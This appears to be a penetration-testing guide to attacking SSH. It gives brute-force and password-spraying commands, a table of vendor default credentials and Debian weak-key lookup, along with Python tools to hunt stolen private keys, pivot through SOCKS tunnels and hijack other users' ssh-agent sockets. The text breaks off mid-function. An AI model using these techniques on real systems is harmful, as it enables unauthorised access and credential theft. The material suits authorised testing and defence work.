SSH- Port 22

Last updated 6 months ago

Basic Information

SSH (Secure Shell) is a network protocol for encrypted remote login, command execution and file transfer (scp/sftp) over an untrusted network; it replaced Telnet, rlogin and rsh. Because it is the standard administrative channel on Linux hosts, network appliances and cloud instances, a weak SSH setup (guessable passwords, leaked private keys, legacy algorithms, forwarded agents) usually means full control of the host and a pivot into the network behind it.

Default port: 22 (TCP)


Example Attack Workflow

Reconnaissance:

  • Use Nmap to scan for open SSH ports (see Port Scanning).

  • Identify the SSH version with nmap -sV (see Service Enumeration).

  • Grab the SSH identification banner for more detail, with nc or telnet (see Banner Grabbing).

Vulnerability Assessment:

  • Run ssh-audit to find weak algorithms, keys and settings (see Public Key Authentication Weaknesses).

  • Search for CVEs matching the detected SSH version (see Check for Known Vulnerabilities).

Brute-Force or Key Exploitation:

  • If password authentication is enabled, try credential guessing with Hydra or Medusa (see Brute force).

  • If an SSH private key has been exposed, use it to authenticate directly (see Using Exposed SSH Keys to Authenticate Directly).

Post-Exploitation:

  • Set up SSH tunnels for lateral movement (see Setting Up SSH Tunnels for Lateral Movement).

  • Hijack forwarded SSH agents or multiplexed sessions where possible (see Hijacking Existing SSH Sessions).


Reconnaissance

Port Scanning

Use Nmap to identify SSH ports. The default is 22, but administrators frequently move sshd to another port, so follow up with a full port scan (-p-) and let -sV recognise the service wherever it listens.

nmap -p22 <target-ip>

Service Enumeration

Check the SSH service version; it is the key for the vulnerability lookup that follows.

nmap -sV -p22 <target-ip>

Banner Grabbing

Read the SSH identification string directly. It reveals the protocol version, the software version and often the distribution package (for example SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6), which hints at the operating system and at backported patches. Most servers send the line as soon as the TCP connection is up, so a plain nc connection is enough; any text printed before the SSH- line is a pre-authentication banner.

nc <target-ip> 22


Vulnerability Assessment

Check for Known Vulnerabilities

  • With the version string from the previous steps, search public databases such as CVE Details or NVD for known vulnerabilities, or let Nmap's NSE scripts do a first pass. Distributions backport fixes without bumping the version number, so a version match is a lead to confirm, not a finding.

nmap --script sshv1 -p22 <target-ip>                                   # Does the server still offer SSH protocol 1?
nmap -p22 <ip> --script ssh2-enum-algos                                # Retrieve supported KEX, host key, cipher and MAC algorithms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full     # Retrieve the host keys in full, not only their fingerprints
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # List the authentication methods offered for a given user
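
Added example (not code from the original page): a small Python banner grabber and parser that does by hand what the nc and nmap steps above do, and then applies the two version-gated checks this section is about: whether the server still offers protocol 1, and whether the advertised OpenSSH release predates the 7.8 fix for the CVE-2018-15473 username enumeration discussed further down. The three sample identification lines, the probe string and the host name in the usage comment are constructed for illustration.

```python
import re
import socket

# Constructed sample identification strings (not captured from any real host).
SAMPLE_BANNERS = [
    b"SSH-2.0-OpenSSH_7.4\r\n",
    b"Authorized access only\r\nSSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.5\r\n",
    b"SSH-1.99-Cisco-1.25\r\n",
]

# RFC 4253 section 4.2: SSH-protoversion-softwareversion SP comments CR LF
IDENT_RE = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)(?: (?P<comments>.*))?$")
IDENT_LINE = re.compile(rb"(?m)^SSH-[^\r\n]*\r?\n")


def parse_banner(raw: bytes) -> dict:
    """Return proto/software/comments from the first SSH- line.

    Lines before it are allowed by the RFC (login banners) and are skipped;
    anything after it (the binary KEXINIT) is ignored.
    """
    for line in raw.decode("ascii", "replace").splitlines():
        m = IDENT_RE.match(line.strip())
        if m:
            return {"proto": m["proto"], "software": m["software"],
                    "comments": m["comments"] or ""}
    raise ValueError("no SSH identification line in input")


def openssh_version(software: str):
    """(major, minor) for strings like OpenSSH_7.4 or OpenSSH_9.6p1, else None."""
    m = re.match(r"OpenSSH_(\d+)\.(\d+)", software)
    return (int(m[1]), int(m[2])) if m else None


def findings(banner: dict) -> list:
    """Version-gated leads to confirm by hand; distributions backport fixes
    without changing the version string, so each hit is a hypothesis."""
    out = []
    if banner["proto"].startswith("1."):
        out.append("offers SSH protocol 1 (1.x or 1.99): broken protocol, confirm with --script sshv1")
    v = openssh_version(banner["software"])
    if v is not None and v < (7, 8):
        out.append("OpenSSH before 7.8: CVE-2018-15473 username enumeration")
    return out


def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> dict:
    """Connect, send our own identification line, read until the server's arrives."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"SSH-2.0-banner-probe\r\n")   # constructed client id; any SSH-2.0-x line is legal
        while not IDENT_LINE.search(data) and len(data) < 64 * 1024:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_banner(data)


if __name__ == "__main__":
    import sys
    for raw in SAMPLE_BANNERS:            # offline run over the constructed samples
        b = parse_banner(raw)
        print(b, findings(b))
    if len(sys.argv) > 1:                 # live run: python3 ssh_banner.py 192.168.1.10 (placeholder)
        b = grab_banner(sys.argv[1])
        print(b, findings(b))
```

The parser tolerates pre-banner text and the trailing KEXINIT bytes, which is what trips up a naive `recv` and `decode`; the version gate is deliberately conservative and names only what the page itself covers.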

Brute force

  • Use Hydra or Medusa to guess passwords for a known username. Keep the thread count low: sshd allows only a handful of attempts per connection (MaxAuthTries, default 6) and tools like fail2ban ban sources that fail repeatedly, so a slow spray of a few likely passwords across many users draws less attention than a long wordlist against one account.

hydra -l <username> -P <password-list> <target-ip> ssh
medusa -h <target-ip> -u <username> -P <password-list> -M ssh

Advanced Brute Force Techniques

Two refinements matter once you are past single-host brute force: spraying a short list of likely passwords across many hosts at once, and reusing credential material you have already captured instead of guessing. One point that trips people up: SSH has no Pass-the-Hash. Password authentication sends the cleartext password inside the encrypted channel and sshd compares it with the stored hash, so a hash from /etc/shadow or a Windows SAM cannot be replayed against SSH the way an NTLM hash can be replayed against SMB. Captured hashes must be cracked offline first (John the Ripper, Hashcat). What can be reused directly is a private key or a live agent socket, both covered below.

Parallel SSH Spraying with CrackMapExec

CrackMapExec (CME, continued as NetExec) automates credential checks across a whole network, including parallel SSH logins against many targets with either a password list or a private key, and records which combinations succeeded.

crackmapexec ssh <target-ip> -u <username> -p <password>
  • <target-ip>: A single host, a CIDR range or a file of targets.

  • -u <username>: A username or a file of usernames.

  • -p <password>: A password or a file of passwords. Use --key-file <id_rsa> instead to test a private key against all targets.

Where to Find Password Hashes?

  • Linux systems: Local hashes live in /etc/shadow (readable only by root). Crack them with John the Ripper or Hashcat and feed the recovered cleartext back into hydra, medusa or CME.

  • Windows systems: Hashes live in the SAM database and in LSASS memory, and Mimikatz can extract them. They are useful for Pass-the-Hash against SMB or WinRM, not SSH; for SSH you still need the cleartext or a key, but the same users often reuse a cracked Windows password on Linux hosts.

  • Post-exploitation reuse: Passwords recovered anywhere (configuration files, shell history, cracked hashes) should be sprayed against every SSH host in scope, because password reuse across systems is the usual way one foothold becomes many.

Public Key Authentication Weaknesses

  • Key-based authentication is only as strong as the keys and the server's algorithm policy. Private keys lying in backups, web roots, container images or repositories, small RSA or DSA host keys, and legacy algorithms (SSH-1, CBC ciphers, diffie-hellman-group1-sha1, MD5 MACs) are all entry points. ssh-audit connects to the server and reports the host key types and sizes, the key exchange, cipher and MAC algorithms it offers, and the CVEs known for the advertised version.

    ssh-audit <target-ip>
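
Added example, not part of the page or of ssh-audit: the same kind of policy check from the inside, for when you have read access to the server's sshd_config (a shell on the box, a configuration backup, an image layer). It parses the file with sshd's own rules, first occurrence of a keyword wins and Match blocks are scoped, and flags the settings that make the attacks in this section possible, with a hardened version of the same file beside it. Both configuration texts are constructed for illustration, and the defaults table covers only the keywords the audit looks at.

```python
# Constructed sshd_config files for illustration (not from any real host).
WEAK_CONFIG = """\
Port 22
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
PasswordAuthentication yes
MaxAuthTries 10
Ciphers aes128-ctr,aes128-cbc,3des-cbc
KexAlgorithms diffie-hellman-group1-sha1,curve25519-sha256
PasswordAuthentication no   # no effect: sshd keeps the first value it saw, above
Match Address 10.0.0.0/8
    PermitRootLogin yes
"""

HARDENED_CONFIG = """\
Port 22
HostKey /etc/ssh/ssh_host_ed25519_key
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 3
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
MACs hmac-sha2-256-etm@openssh.com
"""

# OpenSSH defaults (7.0 and later) for the keywords this audit checks.
DEFAULTS = {"passwordauthentication": "yes", "permitrootlogin": "prohibit-password",
            "permitemptypasswords": "no", "maxauthtries": "6"}

# Substrings that mark legacy algorithms ssh-audit also complains about.
WEAK_ALGOS = {"ciphers": ("-cbc", "arcfour", "blowfish"),
              "kexalgorithms": ("group1-sha1", "group-exchange-sha1", "group14-sha1"),
              "macs": ("-md5", "-96")}


def parse_sshd_config(text: str):
    """Return (global_settings, [(match_criteria, settings), ...]).

    Keywords are case-insensitive, sshd keeps the FIRST value it sees, and
    everything after a Match line belongs to that block. HostKey may repeat.
    """
    global_cfg, blocks = {}, []
    current = global_cfg
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key, val = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            current = {}
            blocks.append((val, current))
        elif key == "hostkey":
            current.setdefault("hostkey", []).append(val)
        else:
            current.setdefault(key, val)
    return global_cfg, blocks


def audit_settings(cfg: dict, scope: str = "global") -> list:
    eff = {**DEFAULTS, **cfg}
    out = []
    if eff["passwordauthentication"] == "yes":
        out.append(f"{scope}: PasswordAuthentication yes, password guessing possible")
    if eff["permitrootlogin"] == "yes":
        out.append(f"{scope}: PermitRootLogin yes, root is a direct brute-force target")
    if eff["permitemptypasswords"] == "yes":
        out.append(f"{scope}: PermitEmptyPasswords yes")
    if int(eff["maxauthtries"]) > 6:
        out.append(f"{scope}: MaxAuthTries {eff['maxauthtries']} exceeds the default 6 guesses per connection")
    for path in cfg.get("hostkey", []):
        if "dsa" in path.lower():
            out.append(f"{scope}: DSA host key {path} (1024-bit, disabled by default since OpenSSH 7.0)")
    for kw, bad in WEAK_ALGOS.items():
        val = cfg.get(kw, "")
        if not val or val.startswith("-"):   # a leading '-' removes from the default set
            continue
        for algo in val.lstrip("+^").split(","):
            if any(b in algo for b in bad):
                out.append(f"{scope}: weak {kw} {algo}")
    return out


def audit_text(text: str) -> list:
    global_cfg, blocks = parse_sshd_config(text)
    out = audit_settings(global_cfg)
    base = {f.split(": ", 1)[1] for f in out}
    for criteria, cfg in blocks:
        # Report only what the Match block makes worse than the global scope.
        merged = audit_settings({**global_cfg, **cfg}, scope=f"Match {criteria}")
        out += [f for f in merged if f.split(": ", 1)[1] not in base]
    return out


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, *audit_text(text), sep="\n  ")
```

The trailing `PasswordAuthentication no` in the weak file is a common real-world mistake: an admin appends the hardened value at the bottom and never notices that sshd already took the `yes` above it.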

Exploit Vulnerabilities

Exploiting Vulnerabilities (e.g., CVE-2018-15473)

Certain flaws, like CVE-2018-15473 (username enumeration in OpenSSH up to 7.7, fixed in 7.8), let an attacker confirm valid usernames from the way sshd handles a malformed authentication request: for a valid user the server drops the connection, for an unknown user it answers with an authentication failure. A confirmed user list makes brute force far cheaper. Outdated ciphers or protocol flaws found during the assessment above are further leads.

Metasploit for SSH Login Brute-Force:

use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target-ip>
set USERNAME <username>
set PASS_FILE <path-to-password-list>
run
  • use auxiliary/scanner/ssh/ssh_login: This module attempts to brute-force SSH credentials.

  • RHOSTS <target-ip>: The target's IP address.

  • USERNAME <username>: Username to brute-force.

  • PASS_FILE <path-to-password-list>: File containing passwords.

Metasploit for SSH Version Enumeration:

use auxiliary/scanner/ssh/ssh_version
set RHOSTS <target-ip>
run
  • use auxiliary/scanner/ssh/ssh_version: This module scans and detects the SSH version running on the target.

  • RHOSTS <target-ip>: The IP address of the target system.

Additional Exploits:

CVE-2018-15473 allows username enumeration:

python ssh_enum.py <target-ip> -U <user-list>

Public proof-of-concept scripts like this one send a malformed SSH_MSG_USERAUTH_REQUEST for each candidate username and report the ones the server treats differently. Metasploit's auxiliary/scanner/ssh/ssh_enumusers module performs the same check.

CVE-2008-0166 (OpenSSL Debian Random Number Generator Vulnerability)

This is an older but critical flaw: between September 2006 and May 2008 Debian's OpenSSL package seeded its PRNG from almost no entropy, so every key generated on an affected system came from a tiny set (about 32,768 per key type, size and architecture) determined by the process ID. Anyone can regenerate all of them.

If a host key or a user's key dates from that era, the matching private key can be looked up rather than cracked.

  1. Download the precomputed key sets for vulnerable Debian OpenSSL versions.

    git clone https://github.com/g0tmi1k/debian-ssh.git
  2. Extract the set matching the target key type and size, then look up the target's public key (the host key from ssh-keyscan, or a user key from an exposed authorized_keys file) in it; the private key stored beside it logs you in.

    cd debian-ssh

Default Credentials

Try the vendor defaults before any wordlist; on appliances and management interfaces they are often never changed.

| Vendor | Usernames | Passwords |
| --- | --- | --- |
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |


Using Exposed SSH Keys to Authenticate Directly

If you obtain an exposed or stolen SSH private key (id_rsa, id_ed25519, id_ecdsa, or any file beginning with -----BEGIN ... PRIVATE KEY-----, typically found in a backup, a repository, a container image or another user's home directory), you can use it to authenticate directly to the SSH service of any host whose authorized_keys lists the matching public key.

Step-by-Step Instructions:

  1. Obtain the SSH Private Key: Copy the key to your machine and check whether it is passphrase-protected. An openssh-key-v1 key with a bcrypt KDF, or a PEM key with a Proc-Type: 4,ENCRYPTED header, needs its passphrase (crack it offline with ssh2john and John the Ripper if you do not have it). The key's comment, or a companion .pub file, often names the owner and the hosts it was meant for.

  2. Check and Set Permissions: The SSH client refuses a private key that is readable by group or others ("UNPROTECTED PRIVATE KEY FILE"). Restrict it to the owner:

    chmod 600 id_rsa
  3. SSH Into the Target Using the Exposed Key: Use the following command to SSH into the target with the private key.

    ssh -i id_rsa <username>@<target-ip>
    • id_rsa: The private key file you obtained.

    • <username>: The account whose authorized_keys holds the matching public key; try the name in the key's comment, the owner of the directory the key was found in, and root.

    • <target-ip>: The IP address or hostname of the target system.

    Example:

    ssh -i id_rsa root@192.168.1.10
  4. Verify Access: If the key is accepted you are in without any credential guessing. If it is not, the same key may still open other hosts: spray it across the SSH hosts in scope (CrackMapExec's --key-file option does this in parallel).
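
Added example, not from the page: a Python helper for the steps above. It hunts a directory tree for private key files, tells you whether a key is usable as-is or still needs its passphrase (the first fields of an openssh-key-v1 blob name the cipher and KDF, and a legacy PEM announces encryption in its Proc-Type header), and stages a copy with the 0600 mode ssh insists on. The sample keys it builds are header-only blobs for the parser, not working keys, and the directory layout it creates is made up.

```python
import base64
import os
import struct
import tempfile


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def constructed_openssh_key(cipher: bytes, kdf: bytes) -> str:
    """Header-only openssh-key-v1 blob for the parser: NOT a usable key."""
    pub = _ssh_string(b"ssh-ed25519") + _ssh_string(b"\x00" * 32)
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(b"") + struct.pack(">I", 1) + _ssh_string(pub))
    body = base64.b64encode(blob).decode()
    lines = [body[i:i + 70] for i in range(0, len(body), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def inspect_private_key(text: str) -> dict:
    """Format, key type and whether a passphrase is needed before ssh -i works."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN ") or "PRIVATE KEY" not in lines[0]:
        raise ValueError("not a PEM or OpenSSH private key")
    label = lines[0][len("-----BEGIN "):].rstrip("-").strip()
    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(b"openssh-key-v1\x00"):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(b"openssh-key-v1\x00")
        cipher, off = _read_string(blob, off)      # "none" when unencrypted
        kdf, off = _read_string(blob, off)         # "bcrypt" when a passphrase is set
        _, off = _read_string(blob, off)           # kdf options (salt, rounds)
        off += 4                                    # uint32 number of keys
        pub, _ = _read_string(blob, off)
        keytype, _ = _read_string(pub, 0)
        return {"format": "openssh-key-v1", "key_type": keytype.decode(),
                "encrypted": cipher != b"none", "cipher": cipher.decode(), "kdf": kdf.decode()}
    headers = {}
    for l in lines[1:]:                             # PEM headers end at the first non-header line
        if ":" not in l:
            break
        k, v = l.split(":", 1)
        headers[k.strip()] = v.strip()
    encrypted = label.startswith("ENCRYPTED") or headers.get("Proc-Type", "").endswith("ENCRYPTED")
    return {"format": "pem", "key_type": label, "encrypted": encrypted,
            "cipher": headers.get("DEK-Info", "").split(",")[0], "kdf": ""}


def find_private_keys(root: str, max_size: int = 64 * 1024) -> list:
    """Paths under root whose first line is a PEM/OpenSSH private key header."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size:
                    continue
                with open(path, "rb") as fh:
                    first = fh.readline()
            except OSError:
                continue
            if first.startswith(b"-----BEGIN ") and b"PRIVATE KEY" in first:
                hits.append(path)
    return sorted(hits)


def stage_key(text: str, dest: str) -> int:
    """Write the key with mode 0600 (ssh refuses group/world-readable keys)."""
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(text)
    os.chmod(dest, 0o600)                           # in case an older, wider file existed
    return os.stat(dest).st_mode & 0o777


def demo() -> dict:
    """Offline run in a temp dir with constructed files; returns checkable results."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "backup", ".ssh"))
        key_path = os.path.join(tmp, "backup", ".ssh", "id_ed25519")
        with open(key_path, "w") as fh:
            fh.write(constructed_openssh_key(b"none", b"none"))
        with open(os.path.join(tmp, "backup", "notes.txt"), "w") as fh:
            fh.write("BEGIN of the week, nothing to see here\n")
        found = find_private_keys(tmp)
        with open(key_path) as fh:
            text = fh.read()
        mode = stage_key(text, os.path.join(tmp, "staged_key"))
        return {"found": [os.path.relpath(p, tmp) for p in found],
                "info": inspect_private_key(text), "mode": mode}


if __name__ == "__main__":
    print(demo())
    # then: ssh -i staged_key <username>@<target-ip>
```

An encrypted key is not a dead end, only a detour through ssh2john; an unencrypted one found in a backup is the finding.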


Post-Exploitation

Setting Up SSH Tunnels for Lateral Movement

SSH tunneling carries arbitrary TCP connections inside the encrypted session to a compromised host, so you can reach machines on its internal network that are not routable from yours. It needs nothing on the pivot beyond sshd itself, which is why it is the first choice for pivoting. Add -N when you only want the forwarding and no remote shell, and -f to background the client.

Step-by-Step Instructions:

  1. SSH Local Port Forwarding: A port on your machine is connected, through the SSH server, to a port on another machine. Use it to reach one internal service.

    Command:

    ssh -L <local-port>:<internal-ip>:<internal-port> <username>@<target-ip>
    • <local-port>: The port on your local machine that you want to use.

    • <internal-ip>: The internal IP address of the machine behind the SSH server you want to reach, as seen from the SSH server (127.0.0.1 means the server itself).

    • <internal-port>: The port on the internal machine that you want to access.

    • <username>@<target-ip>: Credentials and IP address of the compromised SSH server.

    Example:

    ssh -L 8080:10.10.10.5:80 root@192.168.1.10

    This forwards your local port 8080 to port 80 on the internal machine 10.10.10.5. You can then browse the internal server at http://localhost:8080; the web server sees the connection arriving from 192.168.1.10.

  2. SSH Remote Port Forwarding: The reverse direction: a port on the SSH server is connected back to a service on your machine. Use it to give the target network a path to your listener (a reverse shell handler, a payload server, your own SSH).

    Command:

    ssh -R <remote-port>:<local-ip>:<local-port> <username>@<target-ip>

    Example:

    ssh -R 9000:localhost:22 root@192.168.1.10

    Processes on 192.168.1.10 can now reach your local SSH service by connecting to 127.0.0.1:9000. By default sshd binds the remote port to loopback only; other hosts on that network can use it only if the server has GatewayPorts enabled.

  3. Dynamic SSH Tunneling with SOCKS Proxy: Instead of one fixed destination, the SSH client runs a SOCKS proxy on your machine, and every connection made through it leaves from the SSH server. This routes any proxy-aware tool to any host the pivot can reach.

    Command:

    ssh -D <local-port> <username>@<target-ip>

    Example:

    ssh -D 8080 root@192.168.1.10

    This creates a SOCKS proxy on localhost:8080 (SOCKS4 and SOCKS5 are both supported). Point your browser, Burp Suite or proxychains at it. With a tool that hands the hostname to the proxy (SOCKS4a/SOCKS5 with remote DNS), name resolution happens on the SSH server, so internal names resolve and no DNS queries for them leave your machine.
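
Added example, not from the page: a minimal SOCKS5 client in Python that uses the ssh -D proxy from step 3 directly, without proxychains. It shows the exchange both sides perform (greeting, method selection, CONNECT, reply) and sends the destination as a domain name so that the SSH server, not your machine, resolves internal hostnames. The proxy address and the intranet targets are placeholders, and the reply bytes used for the offline check are constructed.

```python
import ipaddress
import socket
import struct

SOCKS_VERSION = 5
REPLY_TEXT = {
    0: "succeeded", 1: "general SOCKS server failure", 2: "connection not allowed by ruleset",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def build_greeting() -> bytes:
    # VER, NMETHODS, METHODS: offer only "no authentication" (0x00), which ssh -D expects.
    return bytes([SOCKS_VERSION, 1, 0x00])


def build_connect_request(host: str, port: int) -> bytes:
    """CONNECT request; IP literals go as ATYP 1/4, names as ATYP 3 (resolved on the pivot)."""
    try:
        ip = ipaddress.ip_address(host)
        addr = (b"\x01" if ip.version == 4 else b"\x04") + ip.packed
    except ValueError:
        name = host.encode("idna")
        addr = b"\x03" + bytes([len(name)]) + name
    return bytes([SOCKS_VERSION, 0x01, 0x00]) + addr + struct.pack(">H", port)


def parse_connect_reply(data: bytes) -> dict:
    """VER REP RSV ATYP BND.ADDR BND.PORT -> ok flag, reason text, bound address."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp, off = data[1], data[3], 4
    if atyp == 1:
        bound, off = str(ipaddress.IPv4Address(data[off:off + 4])), off + 4
    elif atyp == 4:
        bound, off = str(ipaddress.IPv6Address(data[off:off + 16])), off + 16
    elif atyp == 3:
        n = data[off]
        bound, off = data[off + 1:off + 1 + n].decode(), off + 1 + n
    else:
        raise ValueError(f"unknown ATYP {atyp}")
    (port,) = struct.unpack(">H", data[off:off + 2])
    return {"ok": rep == 0, "reason": REPLY_TEXT.get(rep, f"code {rep}"), "bound": (bound, port)}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks5_connect(proxy: tuple, dest: tuple, timeout: float = 10.0) -> socket.socket:
    """Return a TCP socket to dest=(host, port) that runs through the ssh -D proxy."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(build_greeting())
    ver, method = _recv_exact(s, 2)                  # method selection from the proxy
    if ver != SOCKS_VERSION or method != 0x00:
        s.close()
        raise ConnectionError(f"proxy rejected the no-auth method (got {method:#x})")
    s.sendall(build_connect_request(*dest))
    head = _recv_exact(s, 4)                          # VER REP RSV ATYP
    if head[3] == 1:
        rest = _recv_exact(s, 4 + 2)
    elif head[3] == 4:
        rest = _recv_exact(s, 16 + 2)
    else:
        n = _recv_exact(s, 1)
        rest = n + _recv_exact(s, n[0] + 2)
    reply = parse_connect_reply(head + rest)
    if not reply["ok"]:
        s.close()
        raise ConnectionError(f"CONNECT {dest[0]}:{dest[1]} failed: {reply['reason']}")
    return s


def http_get_via_pivot(proxy: tuple, host: str, port: int = 80, path: str = "/") -> bytes:
    """Example use: fetch an internal web page through the tunnel."""
    with socks5_connect(proxy, (host, port)) as s:
        s.sendall(f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
        out = b""
        while chunk := s.recv(4096):
            out += chunk
    return out


if __name__ == "__main__":
    # after: ssh -D 8080 root@192.168.1.10   (pivot and target names are placeholders)
    print(http_get_via_pivot(("127.0.0.1", 8080), "intranet.corp.local")[:300])
```

Any scanner or client you write yourself can pivot this way by swapping `socket.create_connection` for `socks5_connect`; the reply codes tell you whether the pivot could reach the host at all (network or host unreachable) or reached it and was refused, which is useful reconnaissance in itself.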


Hijacking Existing SSH Sessions

In certain post-exploitation scenarios you can ride on SSH sessions that other users of the compromised host already hold. Two artefacts make this possible: a forwarded ssh-agent socket (created when a user connected with ssh -A), which lets anyone who can open it ask the agent to sign authentication challenges, and a ControlMaster multiplexing socket (ControlPath), which lets anyone who can open it start a new session over the already-authenticated connection (ssh's -S option reuses such a socket). Neither hands over the private key; both hand over its use for as long as the session lasts.

Step-by-Step Instructions:

  1. Check for Active SSH Sessions: After gaining access, list the SSH client and server processes. sshd child processes show which users are logged in; ssh client processes show who is hopping onward, including any -A or ControlPath options on their command lines.

    Command:

    ps aux | grep ssh

    As root, /proc/<pid>/environ of each process reveals the SSH_AUTH_SOCK it uses and /proc/<pid>/cmdline the options it was started with.

  2. Check for SSH Agent Forwarding: When an agent is forwarded into a session, sshd creates a socket under /tmp/ssh-XXXXXXXXXX/agent.<pid>, owned by that user. Your own environment shows only your own agent:

    Command:

    env | grep SSH_AUTH_SOCK

    Other users' sockets under /tmp/ssh-*/ can be opened by root or by anyone who has compromised that user. The agent holds the private keys (or a channel back to the machine that holds them) and signs challenges on request, so whoever reaches the socket can authenticate as the key owner.

  3. Hijacking the SSH Agent: Point SSH_AUTH_SOCK at the other user's socket and list what the agent holds.

    Command:

    SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXXX/agent.<pid> ssh-add -l

    If keys are listed (type, fingerprint, comment), every host that trusts one of them is reachable as that user; the comment often names the key's owner and origin host.

  4. Using Hijacked SSH Agent for Pivoting: With SSH_AUTH_SOCK pointing at the hijacked socket, a plain ssh to the next host authenticates with the agent's keys; you never touch a private key file. Adding -A forwards the hijacked agent one hop further, which is exactly the misconfiguration that made the hijack possible, so use it only when the next hop itself needs to hop on.

    Command:

    SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXXX/agent.<pid> ssh -A <username>@<target-ip>

    Example:

    SSH_AUTH_SOCK=/tmp/ssh-AbC123/agent.4242 ssh -A admin@10.10.10.5

    This authenticates to the new target with the hijacked agent and forwards it there as well. The hijack works only while the owner's session, and with it the forwarded socket, is alive; if the owner added keys with ssh-add -c, every signature request pops a confirmation on their machine.
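
Added example, not from the page: a Python client for the ssh-agent protocol that does what ssh-add -l does in step 3 against any socket you can open, and that searches for agent sockets the way an attacker with root would (the /tmp/ssh-*/agent.* paths sshd creates, and the SSH_AUTH_SOCK of every process in /proc). The point it makes is that the socket is the credential: a request of message type 11 returns every loaded key's type, fingerprint and comment, and the same socket signs login challenges. The identities answer used for the offline check is constructed, not captured from a real agent.

```python
import base64
import glob
import hashlib
import socket
import struct

SSH_AGENTC_REQUEST_IDENTITIES = 11
SSH_AGENT_IDENTITIES_ANSWER = 12


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style SHA256 fingerprint of a public key blob (unpadded base64)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def build_request_identities() -> bytes:
    # Every agent message is uint32 length + payload; this payload is just the type byte.
    return _ssh_string(bytes([SSH_AGENTC_REQUEST_IDENTITIES]))


def parse_identities_answer(payload: bytes) -> list:
    """SSH_AGENT_IDENTITIES_ANSWER: type, uint32 nkeys, then (string blob, string comment)*."""
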